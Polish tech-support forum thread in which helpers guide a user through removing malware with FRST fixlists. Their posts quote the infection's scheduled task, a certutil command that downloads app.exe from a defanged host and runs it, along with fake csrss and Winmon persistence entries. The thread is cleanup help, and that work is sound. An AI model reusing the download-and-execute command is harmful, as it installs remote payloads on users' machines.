Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Zamulony komputer, malwarebytes nie włącza się.

dRK96 10 Cze 2018 15:40 411 8
  • #1 10 Cze 2018 15:40
    dRK96
    Poziom 2  

    Witam, dzisiejszej nocy grałem w cs:go i miałem problem z fps'ami mimo iż 30 minut wcześniej wszystko było ok, po sprawdzeniu temperatur , zrestartowałem sprzęt i problem nadal występował. Postanowiłem sprawdzić listę procesów i zauważyłem dziwny proces o nazwie "wupv.exe". Komputer został już przeskanowany antywirusem NOD32. Znalazło wirusy, wyczyściłem, zrestartowałem komputer i nadal mam zużycie procesora na poziomie ~80%. Malwarebytes nie włącza się i wyskakuje błąd o treści "Nie można uruchomić aplikacji, ponieważ jej konfiguracja równoczesna jest niepoprawna..."
    Dodatkowo mam problem z programem FACEIT ANTYCHEAT po nocnych problemach, wyskakuje błąd "You need to disable testsigning to launch FACEIT AC". Wyłączyłem tę opcję i problem nadal jest, proszę o pomoc i z góry dziękuję.

    0 8
  • #2 10 Cze 2018 15:57
    krzychupar
    Poziom 40  

    Odinstaluj:

    CloudNet

    Otwórz notatnik systemowy i wklej:

    CustomCLSID: HKU\S-1-5-21-19353403-1068034637-3662167437-1000_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}\InprocServer32 -> C:\Users\PC-DrK\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll => Brak pliku
    ContextMenuHandlers1: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> Brak pliku
    ContextMenuHandlers2: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> Brak pliku
    ContextMenuHandlers6: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> Brak pliku
    ContextMenuHandlers1_S-1-5-21-19353403-1068034637-3662167437-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => C:\Users\PC-DrK\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll -> Brak pliku
    ContextMenuHandlers4_S-1-5-21-19353403-1068034637-3662167437-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => C:\Users\PC-DrK\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll -> Brak pliku
    ContextMenuHandlers5_S-1-5-21-19353403-1068034637-3662167437-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => C:\Users\PC-DrK\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll -> Brak pliku
    Task: {9942C722-F6D1-418E-BF0E-A672DEE9680C} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://newscommer.com/app/app.exe C:\Users\PC-DrK\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\PC-DrK\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA
    HKU\S-1-5-21-19353403-1068034637-3662167437-1000\...\MountPoints2: G - G:\Install.exe
    HKU\S-1-5-21-19353403-1068034637-3662167437-1000\...\MountPoints2: H - H:\Autorun.exe
    HKU\S-1-5-21-19353403-1068034637-3662167437-1000\...\MountPoints2: {625054cd-fb86-11e6-af47-806e6f6e6963} - F:\Run.exe
    HKU\S-1-5-21-19353403-1068034637-3662167437-1000\...\MountPoints2: {d8392f6f-ff7d-11e6-b331-1c1b0da3cf69} - G:\HiSuiteDownLoader.exe
    R2 WinDefender; C:\Windows\windefender.exe [0 ] () <==== UWAGA (zerobajtowy plik/folder)
    R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== UWAGA (zerobajtowy plik/folder)
    S3 gdrv; \??\C:\Windows\gdrv.sys [X]
    S3 MSICDSetup; \??\F:\CDriver64.sys [X]
    S3 NTIOLib_1_0_C; \??\F:\NTIOLib_X64.sys [X]
    S3 VGPU; System32\drivers\rdvgkmd.sys [X]
    2018-06-10 12:31 - 2018-06-10 12:31 - 000000000 ____D C:\Users\PC-DrK\AppData\Local\ESET
    2018-06-10 02:46 - 2018-06-10 02:46 - 000000000 ____D C:\ProgramData\ESET
    2018-06-10 02:46 - 2018-06-10 02:46 - 000000000 ____D C:\Program Files\ESET
    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze, gdzie masz FRST.exe.
    Uruchom FRST i kliknij w Fix/Napraw.

    0
  • #3 10 Cze 2018 16:09
    dRK96
    Poziom 2  

    W programach i funkcjach nie pokazuje Cloudnet, wkleiłem i problemy nadal występują.
    Czy normalne jest to, że na liście procesów jest aż 5 zakładek od firefoxa?

    @Edit: poniżej log

    0
  • #4 10 Cze 2018 16:36
    krzychupar
    Poziom 40  

    Tak jest to normalne. Zamieść nowe logi z FRST.

    0
  • #8 11 Cze 2018 22:34
    RADU23
    Moderator - Komputery Serwis

    Otwórz notatnik i wklej zawartość:

    Cytat:
    HKU\S-1-5-21-19353403-1068034637-3662167437-1000\...\Run: [AncientWater] => C:\Windows\rss\csrss.exe [3097600 2018-06-10] () <==== UWAGA
    HKU\S-1-5-21-19353403-1068034637-3662167437-1000\...\Run: [CloudNet] => C:\Users\PC-DrK\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-06-10] (EpicNet Inc.) <==== UWAGA
    HKU\S-1-5-21-19353403-1068034637-3662167437-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
    R2 WinDefender; C:\Windows\windefender.exe [0 ] () <==== UWAGA (zerobajtowy plik/folder)
    R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== UWAGA (zerobajtowy plik/folder)
    R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== UWAGA (zerobajtowy plik/folder)
    R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-06-10] () [Brak podpisu cyfrowego] <==== UWAGA

    Zapisz jako fixlist.txt obok FRST.exe i w FRST kliknij "FIX" "Napraw".

    Spróbuj czy MBAM uruchomi się w trybie awaryjnym.

    0
  • #9 11 Cze 2018 22:49
    Kolobos
    Spec od komputerów

    Wykonaj Fixlist.txt:
    CloseProcesses:
    Task: {0BB815CF-E584-4EC0-A891-7E3C6A4A89FD} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://newscommer.com/app/app.exe C:\Users\PC-DrK\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\PC-DrK\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA
    Task: {7D64C3B2-C24A-4272-9E82-9981207B1FA6} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-06-10] () <==== UWAGA
    HKU\S-1-5-21-19353403-1068034637-3662167437-1000\...\Run: [AncientWater] => C:\Windows\rss\csrss.exe [3097600 2018-06-10] () <==== UWAGA
    HKU\S-1-5-21-19353403-1068034637-3662167437-1000\...\Run: [CloudNet] => C:\Users\PC-DrK\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-06-10] (EpicNet Inc.) <==== UWAGA
    R2 WinDefender; C:\Windows\windefender.exe [0 ] () <==== UWAGA (zerobajtowy plik/folder)
    R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== UWAGA (zerobajtowy plik/folder)
    R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== UWAGA (zerobajtowy plik/folder)
    R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-06-10] () [Brak podpisu cyfrowego] <==== UWAGA
    2018-06-10 18:13 - 2018-06-10 18:13 - 000000000 ____D C:\Users\PC-DrK\AppData\Roaming\EpicNet Inc
    2018-06-10 18:12 - 2018-06-10 18:12 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
    2018-06-10 18:12 - 2018-06-10 18:12 - 000003496 _____ C:\Windows\System32\Tasks\ScheduledUpdate
    2018-06-10 15:16 - 2018-06-10 18:12 - 000003180 _____ C:\Windows\System32\Tasks\csrss

    Po wykonaniu zamiesc nowe logi ze skanowania.

    0